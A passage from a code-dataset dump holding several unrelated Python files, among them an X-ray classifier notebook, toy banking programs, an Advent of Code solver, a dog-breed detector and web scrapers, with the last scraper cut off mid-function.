2) & (svm_labels[0] != 2)].shape[0]\n# svm_fp_covid = svm_labels[(svm_labels.label != 2) & (svm_labels[0] == 2)].shape[0]\n# spec_svm_covid = svm_tn_covid/(svm_tn_covid + svm_fp_covid)\n\n# print(f'For NORMAL the sensitivity is {sens_svm_covid}, specificity is {spec_svm_covid}')\n\n\n# In[27]:\n\n\n'''\nDecision Tree Classifier\n'''\n# depth = [d for d in range(1,16)]\n# m3_tr_error = []\n# m3_val_error = []\n# m3_te_error = []\n# m3_f1_scores = []\n# for i in range(1, 16):\n# m3 = DecisionTreeClassifier(criterion='entropy', max_depth=i, random_state=0)\n# m3_train_error, m3_valid_error, m3_test_error, m3_f1, m3_preds = compute_error(m3, img_train.iloc[:, :-1], img_train.iloc[:, -1], test_X, test_y)\n# # tree_train_preds = pd.DataFrame(m3.predict(train_X.iloc[:, -4:]), columns=['decision_tree'])\n# m3_tr_error.append(m3_train_error)\n# m3_val_error.append(m3_valid_error)\n# m3_te_error.append(m3_test_error)\n# m3_f1_scores.append(m3_f1)\n# if i == 6:\n# m3_tree6 = m3_preds\n# m3_f1_final = m3_f1\n# m3_accuracy = metrics.accuracy_score(test_y, m3_tree6, normalize=True)\n \n# # Plot train and valid error against max tree depth\n# plt.figure()\n# plt.plot(depth, m3_tr_error, label='Training Error')\n# plt.plot(depth, m3_val_error, label='Validation Error')\n# plt.plot(depth, m3_te_error, label='Test Error')\n# plt.legend()\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Average Error')\n# plt.title('Decision Tree Classifier (with original features)')\n# plt.show()\n\n# plt.plot(depth, m3_f1_scores)\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Accuracy (F1 Score)')\n# plt.title('Decision Tree Classifier (with original features)')\n# plt.show()\n\n# # _, test_X_PCA = calc_PCA(test_X, 4)\n# # test_X = pd.concat([test_X, test_X_PCA], axis=1)\n# test_y = pd.DataFrame(test_y)\n# m4_f1_scores = []\n# for comp in range(4, 9):\n# m4_tr_error = []\n# m4_val_error = []\n# m4_te_error = []\n# pca_f1_scores = []\n# _, train_X_PCA, test_X_PCA = calc_PCA(train_X, comp, test_X)\n# # test_X_PCA = pca_gen.transform(test_X)\n# for i in range(1, 16):\n# m4 = DecisionTreeClassifier(criterion='entropy', max_depth=i, random_state=0)\n# m4_train_error, m4_valid_error, m4_test_error, m4_f1, m4_preds = compute_error(m4, train_X_PCA, train_y, test_X_PCA, test_y)\n# m4_tr_error.append(m4_train_error)\n# m4_val_error.append(m4_valid_error)\n# m4_te_error.append(m4_test_error)\n# pca_f1_scores.append(m4_f1)\n# m4_f1_scores.append([pca_f1_scores])\n# # Plot train and valid error against max tree depth\n# plt.figure()\n# plt.plot(depth, m4_tr_error, label='Training Error')\n# plt.plot(depth, m4_val_error, label='Validation Error')\n# plt.plot(depth, m4_te_error, label='Test Error')\n# plt.legend()\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Average Error')\n# plt.title(f'Decision Tree Classifier (with {comp} PCA components)')\n# plt.show()\n# if comp == 5:\n# plt.figure()\n# plt.plot(depth, pca_f1_scores)\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Accuracy (F1 Score)')\n# plt.title('Decision Tree Classifier (with 5 PCA components)')\n# plt.show()\n \n# plt.figure()\n# for i in range(len(m4_f1_scores)):\n# plt.plot(depth, m4_f1_scores[i][0], label=f'n={i+4}')\n# plt.legend()\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Accuracy (F1 Score)')\n# plt.title(f'Decision Tree Classifier (with n PCA components)')\n# plt.show()\n\n# print(f'The F1 for Decision Tree is {m3_f1_final}')\n# print(f'The accuracy for kmeans is {m3_accuracy}')\n\ny_train = label_binarize(train_y, classes=[0, 1, 2])\ny_test = label_binarize(test_y, classes=[0, 1, 2])\nn_classes = 3\n\n# # # Learn to predict each class against the other\ndt_clf = OneVsRestClassifier(DecisionTreeClassifier(criterion='entropy', max_depth=6))\n\ny_score = dt_clf.fit(train_X, y_train).predict_proba(test_X)\n\n# # Compute ROC curve and ROC area for each class\nfpr = dict()\ntpr = dict()\nroc_auc = dict()\nfor i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n# # Compute micro-average ROC curve and ROC area\nfpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\nroc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n\nplt.figure()\nlw = 2\nplt.plot(fpr[2], tpr[2], color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC Decision Tree')\nplt.legend(loc=\"lower right\")\nplt.show()\n\n\n# In[ ]:\n\n\ntree_labels = pd.concat([test_y, pd.DataFrame(m3_tree6)], axis=1)\ntree_tp_norm = tree_labels[(tree_labels.label==0) & (tree_labels[0]==0)].shape[0]\ntree_fn_norm = tree_labels[(tree_labels.label==0) & (tree_labels[0] != 0)].shape[0]\nsens_tree_norm = tree_tp_norm/(tree_tp_norm + tree_fn_norm)\n\ntree_tn_norm = tree_labels[(tree_labels.label != 0) & (tree_labels[0] != 0)].shape[0]\ntree_fp_norm = tree_labels[(tree_labels.label != 0) & (tree_labels[0] == 0)].shape[0]\nspec_tree_norm = tree_tn_norm/(tree_tn_norm + tree_fp_norm)\n\nprint(f'For NORMAL the sensitivity is {sens_tree_norm}, specificity is {spec_tree_norm}')\n\n\n# In[ ]:\n\n\ntree_tp_pneu = tree_labels[(tree_labels.label==1) & (tree_labels[0]==1)].shape[0]\ntree_fn_pneu = tree_labels[(tree_labels.label==1) & (tree_labels[0] != 1)].shape[0]\nsens_tree_pneu = tree_tp_pneu/(tree_tp_pneu + tree_fn_pneu)\n\ntree_tn_pneu = tree_labels[(tree_labels.label != 1) & (tree_labels[0] != 1)].shape[0]\ntree_fp_pneu = tree_labels[(tree_labels.label != 1) & (tree_labels[0] == 1)].shape[0]\nspec_tree_pneu = tree_tn_pneu/(tree_tn_pneu + tree_fp_pneu)\n\nprint(f'For NORMAL the sensitivity is {sens_tree_pneu}, specificity is {spec_tree_pneu}')\n\n\n# In[ ]:\n\n\ntree_tp_covid = tree_labels[(tree_labels.label==2) & (tree_labels[0]==2)].shape[0]\ntree_fn_covid = tree_labels[(tree_labels.label==2) & (tree_labels[0] != 2)].shape[0]\nsens_tree_covid = tree_tp_covid/(tree_tp_covid + tree_fn_covid)\n\ntree_tn_covid = tree_labels[(tree_labels.label != 2) & (tree_labels[0] != 2)].shape[0]\ntree_fp_covid = tree_labels[(tree_labels.label != 2) & (tree_labels[0] == 2)].shape[0]\nspec_tree_covid = tree_tn_covid/(tree_tn_covid + tree_fp_covid)\n\nprint(f'For NORMAL the sensitivity is {sens_tree_covid}, specificity is {spec_tree_covid}')\n\n\n# In[ ]:\n\n\nsns.heatmap(correlation_matrix)\ncorrelation_matrix\n\n\n# In[ ]:\n\n\n# decision_tree = DecisionTreeClassifier(criterion='entropy', max_depth=i, random_state=0)\n\n\n# kf = KFold(n_splits=5)\n# kf.get_n_splits(train_X)\n# X = np.array(train_X)\n# y = np.array(train_y)\n# for train_index, valid_index in kf.split(X):\n# X_train, X_valid = X[train_index], X[valid_index]\n# y_train, y_valid = y[train_index], y[valid_index]\n# decision_tree = decision_tree.fit(X_train, y_train)\n# plt.figure()\n# plot_roc_curve(decision_tree, test_X, test_y)\n# plt.show()\n\n# # plt.figure()\n# # plot_roc_curve()\n# # plt.show()\n\n\n# In[ ]:\n\n\ntest = label_binarize(test_y, classes=[0, 1, 2])\ntest\n\n","repo_name":"deantgao/covid_xray_classification","sub_path":"covid_classification.py","file_name":"covid_classification.py","file_ext":"py","file_size_in_byte":21427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2291267167","text":"from abc import ABC, abstractmethod\r\n\r\nclass Account(ABC):\r\n def __init__(self, balance=0):\r\n self.balance = balance\r\n\r\n @abstractmethod\r\n def deposit(self, amount):\r\n pass\r\n\r\n @abstractmethod\r\n def withdraw(self, amount):\r\n pass\r\n\r\n def get_balance(self):\r\n return self.balance\r\n\r\nclass CheckingAccount(Account):\r\n def __init__(self, balance=0):\r\n super().__init__(balance)\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n\r\n def withdraw(self, amount):\r\n if self.balance - amount >= 0:\r\n self.balance -= amount\r\n else:\r\n print(\"Insufficient funds\")\r\n\r\nclass SavingsAccount(Account):\r\n def __init__(self, balance=0):\r\n super().__init__(balance)\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n\r\n def withdraw(self, amount):\r\n if self.balance - amount >= 0:\r\n self.balance -= amount\r\n else:\r\n print(\"Insufficient funds\")\r\n\r\nclass BusinessAccount(Account):\r\n def __init__(self, balance=0):\r\n super().__init__(balance)\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n\r\n def withdraw(self, amount):\r\n if self.balance - amount >= 0:\r\n self.balance -= amount\r\n else:\r\n print(\"Insufficient funds\")\r\n\r\ndef main():\r\n checking = CheckingAccount(1000)\r\n savings = SavingsAccount(5000)\r\n business = BusinessAccount(10000)\r\n\r\n while True:\r\n print(\"1. Checking Account\")\r\n print(\"2. Savings Account\")\r\n print(\"3. Business Account\")\r\n print(\"4. Exit\")\r\n choice = int(input(\"Enter your choice: \"))\r\n if choice == 1:\r\n print(\"1. Deposit\")\r\n print(\"2. Withdraw\")\r\n ch = int(input(\"Enter your choice: \"))\r\n amount = float(input(\"Enter amount: \"))\r\n if ch == 1:\r\n checking.deposit(amount)\r\n elif ch == 2:\r\n checking.withdraw(amount)\r\n elif choice == 2:\r\n print(\"1. Deposit\")\r\n print(\"2. Withdraw\")\r\n ch = int(input(\"Enter your choice: \"))\r\n amount = float(input(\"Enter amount: \"))\r\n if ch == 1:\r\n savings.deposit(amount)\r\n elif ch == 2:\r\n savings.withdraw(amount)\r\n elif choice == 3:\r\n print(\"1. Deposit\")\r\n print(\"2. Withdraw\")\r\n ch = int(input(\"Enter your choice: \"))\r\n amount = float(input(\"Enter amount: \"))\r\n if ch == 1:\r\n business.deposit(amount)\r\n elif ch == 2:\r\n business.withdraw(amount)\r\n elif choice == 4:\r\n break\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"rishavasitis/Miniproject","sub_path":"Bank_account_manager.py","file_name":"Bank_account_manager.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10591342865","text":"import utils\nfrom functools import reduce\nfrom operator import add, mul, gt, lt, eq\n\nDAY = 16\n\nOPERATIONS = [ add, mul, min, max, None, gt, lt, eq ]\n\n\ndef decode_value(string :str) -> tuple:\n \"\"\"returns decimal value and length of string consumed\"\"\"\n s = \"\"\n consumed = 0\n while string[consumed] == \"1\": # part A and B of value (if present)\n s += string[consumed+1 : consumed+5]\n consumed = consumed + 5\n s += string[consumed+1 : consumed+5] # part C of value (end of packet)\n return int(s, 2), consumed + 5\n\n\ndef decode(string :str) -> dict:\n \"\"\"returns a packet as a dictionary\"\"\"\n p_version = int(string[:3], 2)\n p_type = int(string[3:6], 2)\n p_length = 6\n p_value= None\n p_operation = OPERATIONS[p_type]\n p_subpackets = []\n \n if p_type == 4: # value packet\n p_value, length = decode_value(string[6 :])\n p_length += length\n \n else: # operation packet\n p_length_type = string[6]\n\n if p_length_type == \"0\": # subpackets defined by length of string\n sub_p_length = int(string[7:22], 2)\n p_length += 16\n while p_length - 22 < sub_p_length:\n p = decode(string[p_length :])\n p_subpackets.append(p)\n p_length += p[\"length\"]\n \n else: # subpackets defined by number of subpackets\n sub_p_num = int(string[7:18], 2)\n p_length += 12\n while sub_p_num > 0:\n p = decode(string[p_length :])\n p_subpackets.append(p)\n p_length += p[\"length\"]\n sub_p_num -= 1\n\n return {\n \"version\": p_version,\n \"type\" : p_type,\n \"subpackets\" : p_subpackets,\n \"operation\" : p_operation,\n \"value\" : p_value,\n \"length\" : p_length,\n }\n\n\ndef sum_versions(packet :dict) -> int:\n tot = packet[\"version\"]\n for p in packet[\"subpackets\"]:\n tot += sum_versions(p)\n return tot\n\n\ndef compute(packet :dict) -> int:\n if not packet[\"subpackets\"]:\n return packet[\"value\"]\n\n for p in packet[\"subpackets\"]:\n p[\"value\"] = compute(p)\n\n packet[\"value\"] = reduce( packet[\"operation\"], map(lambda p : p[\"value\"], packet[\"subpackets\"]) )\n\n return packet[\"value\"]\n\n\nmessage_hex = utils.read_input(DAY)[0]\nmessage_dec = int(message_hex, 16)\nmessage_bin = format(message_dec, f'0>{len(message_hex)*4}b')\npacket_hierarchy = decode(message_bin)\n\n# part 1\nutils.print_answer(1, sum_versions(packet_hierarchy))\n# part 2\nutils.print_answer(2, compute(packet_hierarchy))","repo_name":"piro-97/AdventOfCode","sub_path":"2021/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28544238595","text":"from extract_bottleneck_features import extract_Xception\r\nimport re\r\nimport numpy as np\r\nimport cv2 \r\n\r\nfrom keras.preprocessing import image \r\nfrom keras.applications.resnet50 import ResNet50\r\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\r\nfrom keras.models import load_model\r\n\r\n\r\ndef path_to_tensor(img_path):\r\n \r\n '''\r\n Function takes a string-valued file path to \r\n a color image as input and returns a 4D tensor suitable for supplying \r\n to a Keras CNN.\r\n Parameters:\r\n img_path (string): file path to a color image\r\n Returns:\r\n (numpy array): 4D tensor for the input image\r\n '''\r\n # loads RGB image as PIL.Image.Image type\r\n img = image.load_img(img_path, target_size=(224, 224))\r\n # convert PIL.Image.Image type to 3D tensor with shape (224, 224, 3)\r\n x = image.img_to_array(img)\r\n # convert 3D tensor to 4D tensor with shape (1, 224, 224, 3) and return 4D tensor\r\n return np.expand_dims(x, axis=0)\r\n\r\ndef face_detector(img_path):\r\n '''\r\n Function returns \"True\" if face is detected in image stored at img_path. \r\n Parameters:\r\n img_path (string): path to the image\r\n Returns: \r\n (boolean): \"True\" if face is detected, \"False\" otherwise\r\n '''\r\n face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')\r\n img = cv2.imread(img_path)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces = face_cascade.detectMultiScale(gray)\r\n return len(faces) > 0\r\n\r\ndef ResNet50_predict_labels(img_path):\r\n '''\r\n Function that returns prediction for the input image according to the \r\n one of 1000 categories in ResNet50.\r\n Paramteres:\r\n img_path(string): path to the input image\r\n Returns:\r\n (integer): integer corresponding to the model's predicted object\r\n class \r\n '''\r\n ResNet50_model = ResNet50(weights=\"imagenet\")\r\n # returns prediction vector for image located at img_path \r\n img = preprocess_input(path_to_tensor(img_path))\r\n return np.argmax(ResNet50_model.predict(img))\r\n\r\ndef dog_detector(img_path):\r\n '''\r\n Function returns \"True\" if dog is detected in image stored at img_path. \r\n Parameters:\r\n img_path (string): path to the image\r\n Returns: \r\n (boolean): \"True\" if dog is detected, \"False\" otherwise\r\n '''\r\n prediction = ResNet50_predict_labels(img_path)\r\n return ((prediction <= 268) & (prediction >= 151)) \r\n\r\n\r\ndef get_dog_names ():\r\n '''\r\n Function that returns dog breed names from the saved file\r\n '''\r\n # define an empty list\r\n dog_names = []\r\n\r\n # open file and read the content in a list\r\n with open('dog_names.txt', 'r') as filehandle:\r\n for line in filehandle:\r\n # remove linebreak which is the last character of the string\r\n currentPlace = line[:-1]\r\n\r\n # add item to the list\r\n dog_names.append(currentPlace)\r\n \r\n return dog_names\r\n\r\ndef predict_breed(img_path):\r\n '''\r\n Function that takes a path to an image as input\r\n and returns the dog breed that is predicted by the model.\r\n Paramteres:\r\n img_path (string): path to the input image\r\n Returns:\r\n (string): predicted dog breed\r\n '''\r\n #Load model\r\n Xception_model = load_model(\"saved_models/Xception_model\")\r\n # extract bottleneck features\r\n bottleneck_feature = extract_Xception(path_to_tensor(img_path))\r\n # obtain predicted vector\r\n predicted_vector = Xception_model.predict(bottleneck_feature)\r\n #get dog breed names\r\n dog_names = get_dog_names()\r\n # assign dog breed that is predicted by the model \r\n dog_breed = dog_names[np.argmax(predicted_vector)]\r\n #return the predicted dog breed\r\n return dog_breed[re.search('\\.', dog_breed).span()[1]:]\r\n\r\ndef dog_breed_detector(img_path):\r\n '''\r\n Function to detect dog breed for input image of human or dog. It returns an error if none.\r\n Parameters:\r\n img_path (string): input image path\r\n Returns:\r\n None\r\n '''\r\n \r\n if face_detector(img_path) > 0:\r\n return(predict_breed(img_path))\r\n \r\n elif dog_detector(img_path) > 0:\r\n return(predict_breed(img_path))\r\n \r\n else:\r\n return(\"Please provide additional photo. Neither human or dog are detected\")","repo_name":"doroslava/Dog_breed_detector","sub_path":"dog-app/detectors.py","file_name":"detectors.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38191762377","text":"import sqlite3\nimport random\n\ndef sql():\n conn = sqlite3.connect('card.s3db')\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS card (\n id INTEGER NOT NULL, \n number TEXT NOT NULL, \n pin TEXT NOT NULL, \n balance INTEGER DEFAULT 0)''')\n conn.commit()\n return conn, c\n\nconn, c = sql()\n\nc.execute('SELECT * FROM card')\n\nclass Menus:\n def main(self):\n print('''1. Create an account\n2. Log into acount\n0. Exit''')\n\n num = int(input())\n return num\n\n def log(self):\n print('''1. Balance\n2. Add income\n3. Do transfer\n4. Close account\n5. Log out\n0. Exit''')\n\n num = int(input())\n return num\n\ndef luhn_algorithm(number):\n total = 0\n new_number = []\n for i, num in enumerate(number, start=1):\n num = int(num)\n if i % 2 != 0:\n num = num * 2\n if num > 9:\n num = num - 9\n\n new_number.append(str(num))\n\n for i in new_number:\n total += int(i)\n\n if total % 10 == 0:\n return True\n\ndef make_card():\n IIN = '400000'\n c.execute('''SELECT id FROM card''')\n all_ids = c.fetchall()\n while True:\n card_num = IIN + \"%010d\" % random.randint(0, 9999999999)\n new_id = int(\"%08d\" % random.randint(0, 99999999))\n if luhn_algorithm(card_num) and (new_id not in all_ids):\n break\n\n card_pin = \"%04d\" % random.randint(0,9999)\n c.execute('''INSERT INTO card (id, number, pin) \n VALUES (?, ?, ?)''', (new_id, card_num, card_pin))\n conn.commit()\n return card_num, card_pin\n\n# All account choices for managing an account\nclass AccountChoices:\n def __init__(self, number, pin):\n self.card_number = number\n self.pin = pin\n self.balance = 0\n self.info = None\n self.add_money = None\n\n # Checks credentials and logs into account\n def login(self):\n c.execute('''SELECT * FROM card\n WHERE number = ? AND pin = ?''', (self.card_number, self.pin))\n self.info = c.fetchone()\n return self.info\n\n # Displays money for account\n def display_balance(self):\n self.balance = self.info[-1]\n print('\\nBalance: ' + str(self.balance) + '\\n')\n\n def add_income(self, money, acc=None):\n if acc:\n c.execute(\"\"\"UPDATE card \n SET balance = balance + ?\n WHERE number = ?\"\"\", (money, acc))\n\n c.execute(\"\"\"UPDATE card \n SET balance = balance - ?\n WHERE number = ?\"\"\", (money, self.card_number))\n\n else:\n c.execute(\"\"\"UPDATE card \n SET balance = balance + ?\n WHERE number = ?\"\"\", (money, self.card_number))\n\n conn.commit()\n self.login()\n\n def transfer_money(self):\n self.balance = self.info[-1]\n list_cards = []\n c.execute(\"SELECT number FROM card\")\n all_cards = c.fetchall()\n for tups in all_cards:\n for card in tups:\n list_cards.append(card)\n\n transfer_account = input('Enter card number:\\n')\n if transfer_account == self.card_number:\n print(\"You can't transfer money to the same account!\\n\")\n elif not luhn_algorithm(transfer_account):\n print('Probably you made mistake in the card number. Please try again!\\n')\n elif transfer_account not in list_cards:\n print('Such a card does not exist.\\n')\n else:\n transfer_amount = input('Enter how much money you want to transfer:\\n')\n if int(transfer_amount) > self.balance:\n print('Not enough money!\\n')\n else:\n self.add_income(transfer_amount, transfer_account)\n print('Success!\\n')\n\n def close_account(self):\n current_card = (self.card_number,)\n c.execute(\"DELETE FROM card WHERE number = ?\", current_card)\n conn.commit()\n\nwhile True:\n user_num = Menus().main()\n print()\n\n if user_num == 1:\n print('Your card has been created')\n user_card, user_pin = make_card()\n print(f'Your card number:\\n{user_card}')\n print(f'Your card PIN:\\n{user_pin}\\n')\n continue\n\n elif user_num == 2:\n user_card = input('Enter your card number:\\n')\n user_pin = input('Enter your PIN:\\n')\n account = AccountChoices(user_card, user_pin)\n account_info = account.login()\n if account_info:\n print('You have successfully logged in!\\n')\n\n while True:\n user_num = Menus().log()\n if user_num == 1:\n # For balance\n account.display_balance()\n\n elif user_num == 2:\n # for adding money\n income = input('\\nEnter income:\\n')\n account.add_income(income)\n\n elif user_num == 3:\n # Transfer money\n print('\\nTransfer')\n account.transfer_money()\n\n elif user_num == 4:\n account.close_account()\n print('The account has been closed!\\n')\n break\n\n elif user_num == 5:\n print('Logging out...\\n')\n break\n\n elif user_num == 0:\n print('Bye!')\n exit()\n\n else:\n print('Not one of the choices\\n')\n\n else:\n print('Wrong card number or PIN!\\n')\n\n else:\n print('Bye!')\n break\nconn.close()\n","repo_name":"Dibichi/Jetbrains-Academy-Python","sub_path":"Medium/banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":5555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10058459072","text":"# scrape down the R CRAN PACKAGE list:\nfrom bs4 import BeautifulSoup\nimport requests\n\nr = requests.get(\n 'https://cran.r-project.org/web/packages/available_packages_by_name.html')\nt = r.text.encode('utf-8')\nsoup = BeautifulSoup(t, 'html.parser')\nfor row in soup.body.table.findAll('tr'):\n cols = row.findAll('td')\n if len(cols) == 0:\n continue\n # print(len(cols))\n # print(cols)\n a = cols[0].find('a')\n if a:\n print(a.contents[0])\n","repo_name":"ssc-oscar/eco-network","sub_path":"code/scrape_downR_CRAN_pack_name.py","file_name":"scrape_downR_CRAN_pack_name.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70870765813","text":"from ast import parse\nimport pathlib \nimport random\nfrom datetime import datetime\nimport argparse\nimport sys\n\n\n# Colors \n###########################################################\nTRED = '\\33[91m'\nBRED = '\\33[41m'\nTWarning = '\\33[93m'\nBWarning = '\\33[43m'\nTSuccess = '\\33[92m'\nBSuccess = '\\33[42m'\nTPrim = '\\33[94m'\nBPrim = '\\33[44m'\nTEND = '\\33[0m' \n###########################################################\n\n# Create the parser\n###########################################################\nmy_parser = argparse.ArgumentParser(fromfile_prefix_chars='@', add_help=False)\n\n# T/F arguments\nmy_parser.add_argument('--comp_only',action=\"store_true\")\nmy_parser.add_argument('--tb_only',action=\"store_true\")\nmy_parser.add_argument('--design_only',action=\"store_true\")\nmy_parser.add_argument('--gui',action=\"store_true\")\n\n# Input arguments\nmy_parser.add_argument('--sim_only',type=str)\nmy_parser.add_argument('-t','--test',type=str, required=True)\nmy_parser.add_argument('-c','--collection',type=str, required=True)\n\n\nargs_command = my_parser.parse_args()\n###########################################################\n\n## Required\n###########################################################\nTestName = args_command.test\ncollectName = args_command.collection\n\n## Dirs\nRootDir = str((pathlib.Path(__file__).parent / \"../../\").resolve())\nRtlDir = f\"{RootDir}/rtl\" \nTBDir = f\"{RootDir}/tb/verif\" \nTBSimpleDir= f\"{RootDir}/tb/simple\" \nEnvDir = f\"{RootDir}/tb/environments/{collectName}\" \nEnvDefDir = f\"{RootDir}/tb/environments/default\"\nTestSVDir = f\"{RootDir}/tb/tests/{collectName}/{TestName}/sv\" \nTestDir = f\"{RootDir}/tb/tests/{collectName}/{TestName}\" \n###########################################################\n\n## Add Arguments from file to command\n###########################################################\nparsed_args = sys.argv[1:]\nwith open(f'{EnvDefDir}/params/run_params', 'r') as f:\n for line in f:\n if line[0] not in (\"#\", \"\\n\", \" \"):\n print(\"_\" + line + \"_\")\n line = line.replace(\"\\n\", \"\")\n parsed_args.append(line)\nwith open(f'{EnvDir}/params/run_params', 'r') as f:\n for line in f:\n if line[0] not in (\"#\", \"\\n\", \" \"):\n print(\"_\" + line + \"_\")\n line = line.replace(\"\\n\", \"\")\n parsed_args.append(line)\nwith open(f'{TestDir}/params/run_params', 'r') as f:\n for line in f:\n if line[0] not in (\"#\", \"\\n\", \" \"):\n print(\"_\" + line + \"_\")\n line = line.replace(\"\\n\", \"\")\n parsed_args.append(line) \n\nprint(parsed_args)\nargs_command = my_parser.parse_args(parsed_args)\n\n# print(\"Here are list of Arguments\")\n# print(args_command)\n###########################################################\n\n\n## Variables \n###########################################################\n\n\n## Command Args \n\n\n## Command Args\nGUI_on = int(args_command.gui)\ncomp_only = int(args_command.comp_only)\nsim_only = args_command.sim_only\nDesignOnly = args_command.design_only or args_command.test == \"no_test\"\nTBOnly = args_command.tb_only\nSimpleTB = int(args_command.test == \"no_test\")\nDesignTB = not (DesignOnly or TBOnly)\n\n## Editable Args \ndebug = \"+acc+/tb/dut\"\n\n# Generate Run Dir based on the seed and date time\nSeed = str(round(random.uniform(1111.11, 9999999.99), 2))\nnow = datetime.now()\ndt_string = now.strftime(\"%Y%m%d_%H%M\")\n\nif sim_only: \n RunDir = RootDir + \"/tb/sim/\" + sim_only\nelse: \n RunDir = RootDir + \"/tb/sim/\" + TestName + \"_\" + dt_string + \"_\" + Seed\n\n###########################################################\n\nif GUI_on == 0: \n GUI = \"-c\"\nelif GUI_on == 1:\n GUI = \"-gui\"\n\n# Contents: \n# - Compilation \n# - Optimization \ntbTop = \"tb\"\n# - Simulation \n\n\n\n\n\"\"\" \nSome Arguments: \n- comp_args \n- sim_args \n- opt_args \n- design_only \n- tb_only \n- comp_only \n- sim_only\n- gui \n- dump_size \n- dump \n- do_file\n- t: test\n\"\"\"\n","repo_name":"a7med7asan15/usb_phy_verif","sub_path":"tb/bin/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28283182680","text":"import os\nfrom glob import glob\n#grab all of the files in a directory and put them in a list\nfrom pprint import pprint as pp\n#prints pretty\nimport csv\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep\nfrom pyquery import PyQuery as pq\n\n\n#We need 51 separate URLS for this one. Queries need to be constructed like this: q=%22New+York%22&page=0\n#Note, the search function is very loose and when you type Washington, it also returns people with the last name Washington. It doesn't actually pay attention to location\n#However, you can clean the data later and drop duplicates if this query/download method doesn't just update an existing file down the road\n\n# Note: when viewing the search result pages, the HTML only displays 20 pages for results. You can go past page 20 by manually changing the page number in the URL, making it difficult to actually know how many pages there are in the scrape. We'll default to 1000 to make sure we get everything\n\n# Note: when combing through the pages, the http GET structure starts with page=0 (think how Python handles indices)\nbaseurl = ['http://names.lawmemorial.org/search.html#q=']\n\n#Similar to script used on the Officer Down Memorial Page, collecting same data, basically\n#list of states\nstates = ['Alabama','Alaska','Arizona','Arkansas','California','Colorado', 'Connecticut','Delaware','Florida','Georgia','Hawaii','Idaho', 'Illinois','Indiana','Iowa','Kansas','Kentucky','Louisiana', 'Maine' 'Maryland','Massachusetts','Michigan','Minnesota', 'Mississippi', 'Missouri','Montana','Nebraska','Nevada', 'New Hampshire','New Jersey','New Mexico','New York', 'North Carolina','North Dakota','Ohio', 'Oklahoma','Oregon','Pennsylvania','Rhode Island', 'South Carolina','South Dakota','Tennessee','Texas','Utah', 'Vermont','Virginia','Washington','West Virginia', 'Wisconsin','Wyoming', 'Washington D.C.', 'Puerto Rico', 'Guam']\n#empty state list that will be appended to add %22 to beginning and ending of each state because that's the boolean notation in the url to match exact phrase\nstates2 = []\n# Append each state to the baseurl and add to a list\nstateurl = []\n# URLs to scrape\nurls = []\n# Search URL: http://names.lawmemorial.org/search.html#q=\n# FULL SEARCH URL: http://names.lawmemorial.org/search.html#q=%22New+York%22&page=0\n\n# We'll want to use sleep(INTEGER) so we don't DDOS the the website\n\n#The site's search function doesn't work properly via blanket GET request.\n#Need to use Selenium to load the HTML and then save it. Get request links later for data\ndriver = webdriver.Firefox()\n\n#function that runs a For loop to generate the URLs to scrape. Save this to a JSON file for easier scraping later\ndef statelist():\n\n\tfor x in states: \n\t\tupdate = '\"' + x + '\"'\n\t\t# replace = x.replace(' ', '+')\n\t\t# update = '&22' + replace + '%22'\n\t\tstates2.append(update)\n\tfor url in baseurl:\n\t\tfor string in states2:\n\t\t\tnewurl = url + string\n\t\t\tstateurl.append(newurl)\n\ndef urllist():\n\tfor urlstate in stateurl:\n\t\tfor x in range(0, 351, 1):\n\t\t\tnewurl = urlstate + '&page=' + str(x)\n\t\t\turls.append(newurl)\n\n# function to write the urls list variable to a local json file for scraping. Run this to save the data locally for posterity. \ndef urls_to_json(url_list, name):\n\twith open(name + '.json', 'w') as outfile:\n\t\tjson.dump(url_list, outfile)\n\n# function to download html of search pages to local directory, also sets the naming\n#Requests won't work on this page, will need to do selenium && request\ndef run(state):\n\tprint('opening 